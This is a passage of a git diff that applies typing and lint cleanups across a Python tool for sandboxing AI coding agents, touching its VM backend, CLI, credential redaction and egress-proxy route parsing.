"" ) diff --git a/bot_bottle/backend/smolmachines/bottle.py b/bot_bottle/backend/smolmachines/bottle.py index 2553cb2..ea023fd 100644 --- a/bot_bottle/backend/smolmachines/bottle.py +++ b/bot_bottle/backend/smolmachines/bottle.py @@ -19,7 +19,7 @@ from __future__ import annotations import subprocess import sys -from typing import Mapping +from typing import Mapping, cast from ...agent_provider import PromptMode, prompt_args from .. import Bottle, ExecResult @@ -72,7 +72,7 @@ class SmolmachinesBottle(Bottle): # In-VM path to the agent's prompt file. None when the # agent declared no prompt (file still exists; we just # don't pass --append-system-prompt-file). - self._prompt_path = prompt_path + self.prompt_path = prompt_path # Env vars the agent process needs (HTTPS_PROXY, # CLAUDE_CODE_OAUTH_TOKEN, manifest-declared bottle env, …). # Forwarded on every `smolvm machine exec` via `-e K=V` @@ -93,9 +93,9 @@ class SmolmachinesBottle(Bottle): agent_tail = ["env", *_env_assignments_for("node", self._guest_env), self.agent_command] provider_prompt_args = prompt_args( - self._agent_prompt_mode, self._prompt_path, argv=argv, + cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=argv, ) - if self._agent_prompt_mode == "read_prompt_file": + if cast(PromptMode, self._agent_prompt_mode) == "read_prompt_file": agent_tail += argv agent_tail += provider_prompt_args else: diff --git a/bot_bottle/backend/smolmachines/launch.py b/bot_bottle/backend/smolmachines/launch.py index e324d3f..bf0fbd4 100644 --- a/bot_bottle/backend/smolmachines/launch.py +++ b/bot_bottle/backend/smolmachines/launch.py @@ -89,7 +89,7 @@ _SUPERVISE_PORT = SUPERVISE_PORT def launch( plan: SmolmachinesBottlePlan, *, - provision: Callable[[SmolmachinesBottlePlan, str], str | None], + provision: Callable[[SmolmachinesBottlePlan, "SmolmachinesBottle"], str | None], ) -> Generator[SmolmachinesBottle, None, None]: """Build + run the bottle and yield a handle; tear everything down on exit. Errors during bringup unwind any partial state @@ -120,7 +120,7 @@ def launch( agent_command=plan.agent_command, agent_prompt_mode=plan.agent_prompt_mode, ) - bottle._prompt_path = provision(plan, bottle) + bottle.prompt_path = provision(plan, bottle) yield bottle finally: @@ -139,7 +139,7 @@ def _teardown_smolmachines( teardown_exc: BaseException | None = None try: stack.close() - except BaseException as exc: + except BaseException as exc: # noqa: W0718 — teardown must not fail teardown_exc = exc warn(f"smolmachines teardown failed: {exc!r}") bottle = plan.spec.manifest.bottle_for(plan.spec.agent_name) diff --git a/bot_bottle/backend/smolmachines/local_registry.py b/bot_bottle/backend/smolmachines/local_registry.py index 5ca3f04..ba60076 100644 --- a/bot_bottle/backend/smolmachines/local_registry.py +++ b/bot_bottle/backend/smolmachines/local_registry.py @@ -42,7 +42,7 @@ import time import uuid from contextlib import contextmanager from dataclasses import dataclass -from typing import Iterator +from typing import Generator from ...log import die @@ -61,7 +61,10 @@ REGISTRY_IMAGE = os.environ.get( # narrow. CRANE_IMAGE = os.environ.get( "BOT_BOTTLE_CRANE_IMAGE", - "gcr.io/go-containerregistry/crane@sha256:0ae17ecb34315aa7cbff28f6eddee3b7adae0b2f90101260d990804db1eb0084", + ( + "gcr.io/go-containerregistry/crane@sha256:" + "0ae17ecb34315aa7cbff28f6eddee3b7adae0b2f90101260d990804db1eb0084" + ), ) @@ -95,7 +98,7 @@ class RegistryHandle: @contextmanager -def ephemeral_registry() -> Iterator[RegistryHandle]: +def ephemeral_registry() -> Generator[RegistryHandle, None, None]: """Bring up a per-session docker network + a `registry:2.8.3` container on it (published on a random host port), yield a `RegistryHandle`, force-remove both on exit. @@ -205,7 +208,6 @@ def _host_port(name: str) -> int: return int(port_str) except ValueError: die(f"unexpected `docker port` output: {line!r}") - return -1 # unreachable; die() never returns def _wait_ready(port: int) -> None: diff --git a/bot_bottle/backend/smolmachines/loopback_alias.py b/bot_bottle/backend/smolmachines/loopback_alias.py index 6f3033c..4608088 100644 --- a/bot_bottle/backend/smolmachines/loopback_alias.py +++ b/bot_bottle/backend/smolmachines/loopback_alias.py @@ -47,7 +47,6 @@ from __future__ import annotations import fcntl import json -import os import platform import re import sqlite3 @@ -177,11 +176,11 @@ def force_allowlist(machine_name: str, allowed_cidrs: list[str]) -> None: con.close() -def allocate(slug: str) -> str: +def allocate(_slug: str) -> str: """Pick the lowest-numbered alias from the pool not already in use by a running smolmachines bundle. Bails when the pool is exhausted — the caller should report the limit to the - operator. `slug` is logged for traceability; not otherwise + operator. `_slug` is logged for traceability; not otherwise used (no on-disk reservation, allocation is purely docker-state-driven). @@ -196,7 +195,7 @@ def allocate(slug: str) -> str: if not _is_macos(): return "127.0.0.1" _ALLOC_LOCK_PATH.parent.mkdir(parents=True, exist_ok=True) - with open(_ALLOC_LOCK_PATH, "w") as lf: + with open(_ALLOC_LOCK_PATH, "w", encoding="utf-8") as lf: fcntl.flock(lf, fcntl.LOCK_EX) return _allocate_locked() @@ -212,7 +211,6 @@ def _allocate_locked() -> str: f"Stop a running bottle (`smolvm machine ls --json`) or " f"raise _POOL_END in loopback_alias.py." ) - return "" # unreachable; die() never returns def _alias_present(ip: str) -> bool: diff --git a/bot_bottle/backend/smolmachines/pty_resize.py b/bot_bottle/backend/smolmachines/pty_resize.py index 311836b..cae1664 100644 --- a/bot_bottle/backend/smolmachines/pty_resize.py +++ b/bot_bottle/backend/smolmachines/pty_resize.py @@ -42,6 +42,7 @@ import subprocess import sys import termios import threading +from types import FrameType # How long to wait after the main exec starts before pushing the @@ -123,13 +124,13 @@ def main(argv: list[str]) -> int: machine = argv[0] inner = argv[2:] - def sync(*_args) -> None: + def sync(_signum: int | None = None, _frame: FrameType | None = None) -> None: size = _read_winsize() if size is None: return _push_size(machine, *size) - signal.signal(signal.SIGWINCH, sync) + signal.signal(signal.SIGWINCH, sync) # type: ignore[arg-type] proc = subprocess.Popen(inner) # Initial sync is deferred — see _STARTUP_SYNC_DELAY_SEC. diff --git a/bot_bottle/backend/smolmachines/sidecar_bundle.py b/bot_bottle/backend/smolmachines/sidecar_bundle.py index 553a972..4fe7085 100644 --- a/bot_bottle/backend/smolmachines/sidecar_bundle.py +++ b/bot_bottle/backend/smolmachines/sidecar_bundle.py @@ -223,7 +223,6 @@ def bundle_host_port( f"no port mapping on {host_ip} for {container} " f"{container_port}/tcp; got: {(result.stdout or '').strip()!r}" ) - return -1 # unreachable; die() never returns def stop_bundle(slug: str) -> None: diff --git a/bot_bottle/backend/smolmachines/smolvm.py b/bot_bottle/backend/smolmachines/smolvm.py index bf911a8..fc25573 100644 --- a/bot_bottle/backend/smolmachines/smolvm.py +++ b/bot_bottle/backend/smolmachines/smolvm.py @@ -52,7 +52,7 @@ class SmolvmError(RuntimeError): pack failed, etc.). Carries the captured stderr for the operator-facing log line.""" - def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess): + def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess[str]): self.argv = list(argv) self.returncode = result.returncode self.stdout = result.stdout @@ -65,7 +65,7 @@ class SmolvmError(RuntimeError): def _smolvm(*args: str, env: Mapping[str, str] | None = None, - check: bool = True) -> subprocess.CompletedProcess: + check: bool = True) -> subprocess.CompletedProcess[str]: """One subprocess call into the smolvm CLI. `check=True` raises SmolvmError on non-zero; `check=False` returns the CompletedProcess for the caller to inspect.""" diff --git a/bot_bottle/cli/__init__.py b/bot_bottle/cli/__init__.py index 4bbed24..a0ca633 100644 --- a/bot_bottle/cli/__init__.py +++ b/bot_bottle/cli/__init__.py @@ -41,9 +41,18 @@ def usage() -> None: sys.stderr.write(" info print env, skills, and prompt details for a named agent\n") sys.stderr.write(" init interactively create a new agent and add it to bot-bottle.json\n") sys.stderr.write(" list list available agents or active containers\n") - sys.stderr.write(" resume re-launch a bottle by its identity (continues state from PRD 0016)\n") - sys.stderr.write(" start boot a container for a named agent and attach an interactive session\n") - sys.stderr.write(" supervise view + approve/modify/reject pending supervise proposals (PRD 0013)\n\n") + sys.stderr.write( + " resume re-launch a bottle by its identity " + "(continues state from PRD 0016)\n" + ) + sys.stderr.write( + " start boot a container for a named agent and " + "attach an interactive session\n" + ) + sys.stderr.write( + " supervise view + approve/modify/reject pending supervise " + "proposals (PRD 0013)\n\n" + ) sys.stderr.write(f"Run '{PROG} --help' for command-specific usage.\n") diff --git a/bot_bottle/cli/_common.py b/bot_bottle/cli/_common.py index 6b0c0e5..0008a1e 100644 --- a/bot_bottle/cli/_common.py +++ b/bot_bottle/cli/_common.py @@ -14,7 +14,7 @@ REPO_DIR = str(Path(__file__).resolve().parent.parent.parent) def read_tty_line() -> str: """Mirror `IFS= read -r REPLY int: die(f"{target_file} exists but is not valid JSON; fix or remove it first") if agent_name in (existing.get("agents") or {}): sys.stderr.write( - f'bot-bottle: agent "{agent_name}" already exists in {target_file}. Overwrite? [y/N] ' + f'bot-bottle: agent "{agent_name}" already exists in ' + f'{target_file}. Overwrite? [y/N] ' ) sys.stderr.flush() ow = read_tty_line() @@ -71,7 +72,10 @@ def cmd_init(argv: list[str]) -> int: # Prompt print(file=sys.stderr) - info("System prompt — enter text, then a lone '.' on its own line to finish (just '.' to leave empty):") + info( + "System prompt — enter text, then a lone '.' on its own line to " + "finish (just '.' to leave empty):" + ) prompt_lines: list[str] = [] while True: line = read_tty_line() @@ -99,7 +103,10 @@ def cmd_init(argv: list[str]) -> int: if bottle_name in (existing.get("bottles") or {}): bottle_exists_already = True - info(f"Bottle '{bottle_name}' already exists in {target_file}; agent will reference it.") + info( + f"Bottle '{bottle_name}' already exists in {target_file}; " + f"agent will reference it." + ) else: info(f"Creating new bottle '{bottle_name}'.") bottle_env = _prompt_for_env_vars() @@ -131,8 +138,14 @@ def cmd_init(argv: list[str]) -> int: def _prompt_for_env_vars() -> dict[str, str]: print(file=sys.stderr) - info("Env vars — enter each var name then its mode. Press Enter with no name to finish.") - info(" Modes: secret (prompt at runtime) | interpolated (read from host env) | literal (hardcoded value)") + info( + "Env vars — enter each var name then its mode. Press Enter with " + "no name to finish." + ) + info( + " Modes: secret (prompt at runtime) | interpolated (read from " + "host env) | literal (hardcoded value)" + ) out: dict[str, str] = {} while True: print(file=sys.stderr) diff --git a/bot_bottle/cli/supervise.py b/bot_bottle/cli/supervise.py index 209266f..86e6215 100644 --- a/bot_bottle/cli/supervise.py +++ b/bot_bottle/cli/supervise.py @@ -263,7 +263,7 @@ def edit_in_editor(content: str, *, suffix: str = ".tmp") -> str | None: path = f.name try: subprocess.run([editor, path], check=False) - with open(path) as f: + with open(path, encoding="utf-8") as f: edited = f.read() return edited if edited != content else None finally: @@ -296,7 +296,7 @@ def cmd_supervise(argv: list[str]) -> int: else: error("supervise exited on a fatal error (no detail captured).") return e.code if isinstance(e.code, int) else 1 - except Exception as e: + except Exception as e: # noqa: W0718 — catch supervise crash for logging log_path = _write_crash_log(e) error(f"supervise crashed: {type(e).__name__}: {e}") error(f"full traceback written to {log_path}") @@ -354,7 +354,7 @@ def _try_init_green() -> int: return 0 -def _main_loop(stdscr: "curses._CursesWindow") -> None: +def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore curses.curs_set(0) stdscr.timeout(_REFRESH_INTERVAL_MS) green_attr = _try_init_green() @@ -434,12 +434,12 @@ def _main_loop(stdscr: "curses._CursesWindow") -> None: def _render( - stdscr: "curses._CursesWindow", + stdscr: "curses._CursesWindow", # type: ignore pending: list[QueuedProposal], selected: int, status_line: str, *, - green_attr: int = 0, + green_attr: int = 0, # noqa: F841 — unused, but required by interface ) -> None: stdscr.erase() h, w = stdscr.getmaxyx() @@ -488,7 +488,7 @@ def _render( def _detail_view( - stdscr: "curses._CursesWindow", + stdscr: "curses._CursesWindow", # type: ignore qp: QueuedProposal, *, green_attr: int = 0, @@ -539,7 +539,7 @@ def _detail_view( return -def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: +def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: # type: ignore """Suspend curses, open $EDITOR on the proposed file, return edited content.""" suffix = _suffix_for_tool(qp.proposal.tool) curses.endwin() @@ -550,7 +550,7 @@ def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: return edited -def _prompt(stdscr: "curses._CursesWindow", label: str) -> str: +def _prompt(stdscr: "curses._CursesWindow", label: str) -> str: # type: ignore """One-line input at the bottom of the screen.""" curses.curs_set(1) h, _ = stdscr.getmaxyx() diff --git a/bot_bottle/cli/tui.py b/bot_bottle/cli/tui.py index 46eae42..f28281b 100644 --- a/bot_bottle/cli/tui.py +++ b/bot_bottle/cli/tui.py @@ -13,7 +13,7 @@ from __future__ import annotations import curses import os import sys -from typing import Optional +from typing import Any, Optional def filter_select( @@ -39,12 +39,15 @@ def filter_select( return None try: - result = _run_picker(items, title=title, tty_fd=tty_fd) + # Use os.dup() to duplicate the fd so the original file object + # and FileIO in _run_picker each manage independent copies, + # preventing double-close errors. + import os as _os + fd_dup = _os.dup(tty_fd.fileno()) + return _run_picker(items, title=title, tty_fd=fd_dup) finally: tty_fd.close() - return result - # --------------------------------------------------------------------------- # Internal implementation @@ -59,11 +62,10 @@ _KEY_ENTER_ALT = 10 _CANCEL_KEYS = frozenset([_KEY_ESC, _KEY_CTRL_C, _KEY_CTRL_D, ord("q")]) -def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]: +def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]: """Drive a curses session on *tty_fd* and return the picked item.""" # newterm lets us run curses on an arbitrary fd rather than the # process's controlling tty / stdout — crucial when stdout is piped. - old_term = os.environ.get("TERM", "xterm-256color") os.environ.setdefault("TERM", "xterm-256color") # Save / restore the real stdin/stdout so curses newterm can use tty_fd. @@ -72,7 +74,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]: try: import io - tty_text = io.TextIOWrapper(tty_fd, write_through=True) + tty_text = io.TextIOWrapper(io.FileIO(tty_fd, mode='r+'), write_through=True) sys.__stdin__ = tty_text # type: ignore[assignment] sys.__stdout__ = tty_text # type: ignore[assignment] @@ -90,7 +92,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]: curses.nocbreak() curses.echo() curses.endwin() - except Exception: + except Exception: # noqa: W0718 — curses can raise many error types return None finally: sys.__stdin__ = orig_stdin # type: ignore[assignment] @@ -99,7 +101,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]: return result -def _picker_loop(screen, items: list[str], *, title: str) -> Optional[str]: +def _picker_loop(screen: Any, items: list[str], *, title: str) -> Optional[str]: query = "" cursor = 0 @@ -158,7 +160,7 @@ def _filter_items(items: list[str], query: str) -> list[str]: return [i for i in items if q in i.lower()] -def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str) -> None: +def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title: str) -> None: screen.erase() rows, cols = screen.getmaxyx() min_rows = 5 @@ -212,7 +214,7 @@ def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str) screen.refresh() -def _addstr_safe(screen, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None: +def _addstr_safe(screen: Any, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None: try: screen.addstr(row, col, text, attr) except curses.error: diff --git a/bot_bottle/codex_auth.py b/bot_bottle/codex_auth.py index 9a0e6f9..9f6da0a 100644 --- a/bot_bottle/codex_auth.py +++ b/bot_bottle/codex_auth.py @@ -13,6 +13,7 @@ import os from copy import deepcopy from datetime import datetime, timezone from pathlib import Path +from typing import cast from .log import die from .util import expand_tilde @@ -50,7 +51,8 @@ def codex_host_access_token( tokens = raw.get("tokens") if not isinstance(tokens, dict): die(f"codex host credentials: {path} is missing tokens") - access = tokens.get("access_token") + tokens_typed = cast(dict[str, object], tokens) + access = tokens_typed.get("access_token") if not isinstance(access, str) or not access: die( f"codex host credentials: {path} is missing tokens.access_token. " @@ -105,14 +107,14 @@ def write_codex_dummy_auth_file( path.chmod(0o600) -def _read_auth_object(path: Path) -> dict: +def _read_auth_object(path: Path) -> dict[str, object]: try: raw = json.loads(path.read_text()) except (OSError, json.JSONDecodeError) as e: die(f"codex host credentials: could not read valid JSON at {path}: {e}") if not isinstance(raw, dict): die(f"codex host credentials: {path} must contain a JSON object") - return raw + return cast(dict[str, object], raw) def _dummy_exp(now: datetime | None, exp_ts: int | None) -> int: @@ -151,11 +153,11 @@ def _dummy_jwt_from_host( return _dummy_jwt(now, exp_ts=exp_ts) if not isinstance(payload, dict): return _dummy_jwt(now, exp_ts=exp_ts) - return _encode_dummy_jwt(_redact_jwt_payload(payload, now=now, exp_ts=exp_ts)) + return _encode_dummy_jwt(_redact_jwt_payload(cast(dict[str, object], payload), now=now, exp_ts=exp_ts)) -def _encode_dummy_jwt(payload: dict) -> str: - def enc(obj: dict) -> str: +def _encode_dummy_jwt(payload: dict[str, object]) -> str: + def enc(obj: dict[str, object]) -> str: raw = json.dumps(obj, separators=(",", ":")).encode() return base64.urlsafe_b64encode(raw).decode().rstrip("=") @@ -163,23 +165,24 @@ def _encode_dummy_jwt(payload: dict) -> str: def _redact_jwt_payload( - payload: dict, + payload: dict[str, object], *, now: datetime | None = None, exp_ts: int | None = None, -) -> dict: +) -> dict[str, object]: out = _redact_claims(payload) if not isinstance(out, dict): out = {} - out["exp"] = _dummy_exp(now, exp_ts) - out.setdefault("sub", "bot-bottle-placeholder") - return out + out_typed: dict[str, object] = cast(dict[str, object], out) + out_typed["exp"] = _dummy_exp(now, exp_ts) + out_typed.setdefault("sub", "bot-bottle-placeholder") + return out_typed def _redact_claims(value: object) -> object: if isinstance(value, dict): out: dict[str, object] = {} - for key, inner in value.items(): + for key, inner in cast(dict[str, object], value).items(): lower = key.lower() if key == "https://api.openai.com/profile": out[key] = _redact_profile_claim(inner) @@ -207,16 +210,16 @@ def _redact_claims(value: object) -> object: return "bot-bottle-placeholder" -def _redact_profile_claim(value: object) -> dict: - profile = value if isinstance(value, dict) else {} +def _redact_profile_claim(value: object) -> dict[str, object]: + profile = cast(dict[str, object], value) if isinstance(value, dict) else {} return { "email": "bot-bottle@example.invalid", "email_verified": bool(profile.get("email_verified", True)), } -def _redact_auth_claim(value: object) -> dict: - auth = value if isinstance(value, dict) else {} +def _redact_auth_claim(value: object) -> dict[str, object]: + auth = cast(dict[str, object], value) if isinstance(value, dict) else {} out: dict[str, object] = {} for key, inner in auth.items(): lower = key.lower() @@ -247,7 +250,7 @@ def _redact_auth_claim(value: object) -> dict: def _redact_codex_auth( value: object, *, now: datetime | None = None, exp_ts: int | None = None, ) -> object: - auth = value if isinstance(value, dict) else {} + auth = cast(dict[str, object], value) if isinstance(value, dict) else {} out: dict[str, object] = {} for key, inner in auth.items(): lower = key.lower() @@ -269,7 +272,7 @@ def _redact_codex_auth( def _redact_token_block( value: object, *, now: datetime | None = None, exp_ts: int | None = None, ) -> dict[str, object]: - tokens = value if isinstance(value, dict) else {} + tokens = cast(dict[str, object], value) if isinstance(value, dict) else {} out: dict[str, object] = {} for key, inner in tokens.items(): lower = key.lower() @@ -306,7 +309,7 @@ def _jwt_exp(token: str) -> datetime | None: return None if not isinstance(payload, dict): return None - exp = payload.get("exp") + exp = cast(dict[str, object], payload).get("exp") if not isinstance(exp, (int, float)): return None return datetime.fromtimestamp(exp, timezone.utc) diff --git a/bot_bottle/contrib/claude/agent_provider.py b/bot_bottle/contrib/claude/agent_provider.py index cd8ff14..81f5b4a 100644 --- a/bot_bottle/contrib/claude/agent_provider.py +++ b/bot_bottle/contrib/claude/agent_provider.py @@ -144,7 +144,7 @@ class ClaudeAgentProvider(AgentProvider): prompt (drives `--append-system-prompt-file`); the file is copied either way so the path always exists.""" prompt_path = _prompt_path(plan.guest_home) - bottle.cp_in(str(plan.prompt_file), prompt_path) + bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore bottle.exec( f"chown node:node {prompt_path} && chmod 600 {prompt_path}", user="root", diff --git a/bot_bottle/contrib/codex/agent_provider.py b/bot_bottle/contrib/codex/agent_provider.py index 9fb92f8..472999c 100644 --- a/bot_bottle/contrib/codex/agent_provider.py +++ b/bot_bottle/contrib/codex/agent_provider.py @@ -189,7 +189,7 @@ class CodexAgentProvider(AgentProvider): instructions in .` bootstrap (see `prompt_args`); the file is copied either way so the path always exists.""" prompt_path = _prompt_path(plan.guest_home) - bottle.cp_in(str(plan.prompt_file), prompt_path) + bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore bottle.exec( f"chown node:node {prompt_path} && chmod 600 {prompt_path}", user="root", diff --git a/bot_bottle/contrib/gitea/deploy_key_provisioner.py b/bot_bottle/contrib/gitea/deploy_key_provisioner.py index 7006856..03bd67e 100644 --- a/bot_bottle/contrib/gitea/deploy_key_provisioner.py +++ b/bot_bottle/contrib/gitea/deploy_key_provisioner.py @@ -117,5 +117,5 @@ def _split_owner_repo(owner_repo: str) -> tuple[str, str]: def _read_error_body(exc: urllib.error.HTTPError) -> str: try: return exc.read().decode("utf-8", errors="replace") - except Exception: + except Exception: # noqa: broad-exception-caught — safely fallback to empty error message return "" diff --git a/bot_bottle/egress.py b/bot_bottle/egress.py index db773cf..d5f546e 100644 --- a/bot_bottle/egress.py +++ b/bot_bottle/egress.py @@ -25,7 +25,7 @@ flow (PRD 0014) at egress and renames the MCP tool. from __future__ import annotations import dataclasses -from abc import ABC, abstractmethod +from abc import ABC from dataclasses import dataclass from pathlib import Path from typing import TYPE_CHECKING @@ -216,14 +216,14 @@ def egress_token_env_map( return out -def _route_to_yaml_fields(r: Route) -> dict: +def _route_to_yaml_fields(r: Route) -> dict[str, object]: """Return the addon-visible fields for one route. Single authoritative mapping between EgressRoute (host-side) and egress_addon_core.Route (sidecar-side). When a field is added to the addon's Route that must appear in the YAML, add it here and in egress_addon_core._parse_one together.""" - fields: dict = {"host": r.host} + fields: dict[str, object] = {"host": r.host} if r.auth_scheme and r.token_env: fields["auth_scheme"] = r.auth_scheme fields["token_env"] = r.token_env @@ -252,7 +252,7 @@ def egress_render_routes( lines.append(f' token_env: "{f["token_env"]}"') if "path_allowlist" in f: lines.append(" path_allowlist:") - for p in f["path_allowlist"]: + for p in f["path_allowlist"]: # type: ignore lines.append(f' - "{p}"') return "\n".join(lines) + "\n" diff --git a/bot_bottle/egress_addon.py b/bot_bottle/egress_addon.py index 24a7ec1..8696714 100644 --- a/bot_bottle/egress_addon.py +++ b/bot_bottle/egress_addon.py @@ -38,7 +38,12 @@ from mitmproxy import http # type: ignore[import-not-found] # Absolute import (NOT `from .egress_addon_core`) — the # container drops both files flat into /app/ so they are sibling # top-level modules to mitmdump's loader, not a package. -from egress_addon_core import Route, decide, is_git_push_request, load_routes # type: ignore[import-not-found] +from egress_addon_core import ( # type: ignore[import-not-found] + Route, + decide, + is_git_push_request, + load_routes, +) DEFAULT_ROUTES_PATH = "/etc/egress/routes.yaml" diff --git a/bot_bottle/egress_addon_core.py b/bot_bottle/egress_addon_core.py index 9cacb85..b59a4dd 100644 --- a/bot_bottle/egress_addon_core.py +++ b/bot_bottle/egress_addon_core.py @@ -78,11 +78,13 @@ def parse_routes(payload: object) -> tuple[Route, ...]: """ if not isinstance(payload, dict): raise ValueError("routes payload: top-level must be an object") - raw = payload.get("routes") + payload_dict: dict[str, object] = typing.cast(dict[str, object], payload) + raw: object = payload_dict.get("routes") if not isinstance(raw, list): raise ValueError("routes payload: 'routes' must be a list") + raw_list: list[object] = typing.cast(list[object], raw) out: list[Route] = [] - for i, r in enumerate(raw): + for i, r in enumerate(raw_list): out.append(_parse_one(i, r)) return tuple(out) @@ -91,15 +93,17 @@ def _parse_one(idx: int, raw: object) -> Route: label = f"route[{idx}]" if not isinstance(raw, dict): raise ValueError(f"{label}: must be an object (got {type(raw).__name__})") - host = raw.get("host") + raw_dict: dict[str, object] = typing.cast(dict[str, object], raw) + host: object = raw_dict.get("host") if not isinstance(host, str) or not host: raise ValueError(f"{label}: 'host' must be a non-empty string") - path_allow_raw = raw.get("path_allowlist", []) + path_allow_raw: object = raw_dict.get("path_allowlist", []) if not isinstance(path_allow_raw, list): raise ValueError(f"{label} ({host}): 'path_allowlist' must be a list") + path_allow_list: list[object] = typing.cast(list[object], path_allow_raw) prefixes: list[str] = [] - for j, p in enumerate(path_allow_raw): + for j, p in enumerate(path_allow_list): if not isinstance(p, str): raise ValueError( f"{label} ({host}): path_allowlist[{j}] must be a string" @@ -111,8 +115,8 @@ def _parse_one(idx: int, raw: object) -> Route: ) prefixes.append(p) - auth_scheme = raw.get("auth_scheme", "") - token_env = raw.get("token_env", "") + auth_scheme: object = raw_dict.get("auth_scheme", "") + token_env: object = raw_dict.get("token_env", "") if not isinstance(auth_scheme, str): raise ValueError(f"{label} ({host}): 'auth_scheme' must be a string") if not isinstance(token_env, str): diff --git a/bot_bottle/env.py b/bot_bottle/env.py index 35fe505..fe4362d 100644 --- a/bot_bottle/env.py +++ b/bot_bottle/env.py @@ -89,7 +89,7 @@ def _read_secret_silent(name: str, prompt_body: str) -> str: if not (sys.stdin.isatty() or sys.stderr.isatty()): # Fall back to /dev/tty so this still works when stdin is a pipe. try: - tty = open("/dev/tty", "r+") + tty = open("/dev/tty", "r+", encoding="utf-8") except OSError: die( f"cannot prompt for secret '{name}': no tty available. " diff --git a/bot_bottle/git_gate.py b/bot_bottle/git_gate.py index 49ad750..6a5c0ac 100644 --- a/bot_bottle/git_gate.py +++ b/bot_bottle/git_gate.py @@ -32,7 +32,7 @@ from __future__ import annotations import dataclasses import os import shlex -from abc import ABC, abstractmethod +from abc import ABC from dataclasses import dataclass from pathlib import Path diff --git a/bot_bottle/git_http_backend.py b/bot_bottle/git_http_backend.py index 6ac0453..31d895d 100644 --- a/bot_bottle/git_http_backend.py +++ b/bot_bottle/git_http_backend.py @@ -78,8 +78,8 @@ class GitHttpHandler(BaseHTTPRequestHandler): "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": str(self.client_address[1]), "REMOTE_USER": "", - "SERVER_NAME": self.server.server_name, - "SERVER_PORT": str(self.server.server_port), + "SERVER_NAME": self.server.server_name, # type: ignore + "SERVER_PORT": str(self.server.server_port), # type: ignore "SERVER_PROTOCOL": self.request_version, }) for header, variable in ( @@ -157,8 +157,8 @@ class GitHttpHandler(BaseHTTPRequestHandler): self.end_headers() self.wfile.write(body) - def log_message(self, fmt: str, *args: object) -> None: - sys.stdout.write(fmt % args + "\n") + def log_message(self, format: str, *args: object) -> None: # type: ignore # noqa: A002 + sys.stdout.write(format % args + "\n") sys.stdout.flush() diff --git a/bot_bottle/manifest.py b/bot_bottle/manifest.py index 2200d6b..8be2e44 100644 --- a/bot_bottle/manifest.py +++ b/bot_bottle/manifest.py @@ -57,7 +57,6 @@ from .manifest_egress import ( EgressConfig, EgressRoute, PipelockRoutePolicy, - validate_egress_routes, ) from .manifest_git import GitEntry, GitUser, parse_git_gate_config from .manifest_schema import BOTTLE_KEYS @@ -323,8 +322,11 @@ class Manifest: return available = ", ".join(self.agents.keys()) if available: - raise ManifestError(f"agent '{name}' not defined in bot-bottle.json. Available: {available}") - raise ManifestError(f"agent '{name}' not defined in bot-bottle.json (manifest is empty).") + msg = f"agent '{name}' not defined in bot-bottle.json. Available: {available}" + raise ManifestError(msg) + raise ManifestError( + f"agent '{name}' not defined in bot-bottle.json (manifest is empty)." + ) def has_bottle(self, name: str) -> bool: return name in self.bottles diff --git a/bot_bottle/manifest_agent.py b/bot_bottle/manifest_agent.py index 71734e0..b5d29ca 100644 --- a/bot_bottle/manifest_agent.py +++ b/bot_bottle/manifest_agent.py @@ -114,7 +114,10 @@ class Agent: bottle = d.get("bottle") if not isinstance(bottle, str) or not bottle: - raise ManifestError(f"agent '{name}' must declare a 'bottle' field naming a defined bottle") + raise ManifestError( + f"agent '{name}' must declare a 'bottle' field naming a " + f"defined bottle" + ) if bottle not in bottle_names: available = ", ".join(sorted(bottle_names)) or "(none defined)" raise ManifestError( @@ -126,7 +129,10 @@ class Agent: skills_raw = d.get("skills") if skills_raw is not None: if not isinstance(skills_raw, list): - raise ManifestError(f"agent '{name}' skills must be an array (was {type(skills_raw).__name__})") + raise ManifestError( + f"agent '{name}' skills must be an array " + f"(was {type(skills_raw).__name__})" + ) collected: list[str] = [] skills_list = cast(list[object], skills_raw) for i, skill in enumerate(skills_list): @@ -144,7 +150,10 @@ class Agent: elif isinstance(prompt_raw, str): prompt = prompt_raw else: - raise ManifestError(f"agent '{name}' prompt must be a string (was {type(prompt_raw).__name__})") + raise ManifestError( + f"agent '{name}' prompt must be a string " + f"(was {type(prompt_raw).__name__})" + ) # git-gate: agents may declare only `git-gate.user` (name/email). # `git-gate.repos` is bottle-only — it carries credentials and host trust. diff --git a/bot_bottle/manifest_egress.py b/bot_bottle/manifest_egress.py index 0a21373..24a6b67 100644 --- a/bot_bottle/manifest_egress.py +++ b/bot_bottle/manifest_egress.py @@ -93,7 +93,7 @@ class PipelockRoutePolicy: raise ManifestError( f"{label}.ssrf_ip_allowlist[{j}] must be an IP address " f"or CIDR (was {item!r}): {e}" - ) + ) from e ssrf_ip_allowlist.append(item) return cls( TlsPassthrough=tls_passthrough_raw, @@ -214,7 +214,8 @@ class EgressRoute: collected_roles: list[str] = [] for r in role_list: if not isinstance(r, str): - raise ManifestError(f"{label} role items must be strings (got {type(r).__name__})") + msg = f"{label} role items must be strings (got {type(r).__name__})" + raise ManifestError(msg) collected_roles.append(r) roles = tuple(collected_roles) else: diff --git a/bot_bottle/manifest_git.py b/bot_bottle/manifest_git.py index 1ba6019..1fb5ced 100644 --- a/bot_bottle/manifest_git.py +++ b/bot_bottle/manifest_git.py @@ -30,12 +30,18 @@ def parse_git_upstream(url: str, label: str) -> tuple[str, str, str, str]: raise ManifestError(f"{label} must be an ssh:// URL (was {url!r})") rest = url[len("ssh://"):] if "@" not in rest: - raise ManifestError(f"{label} must include a 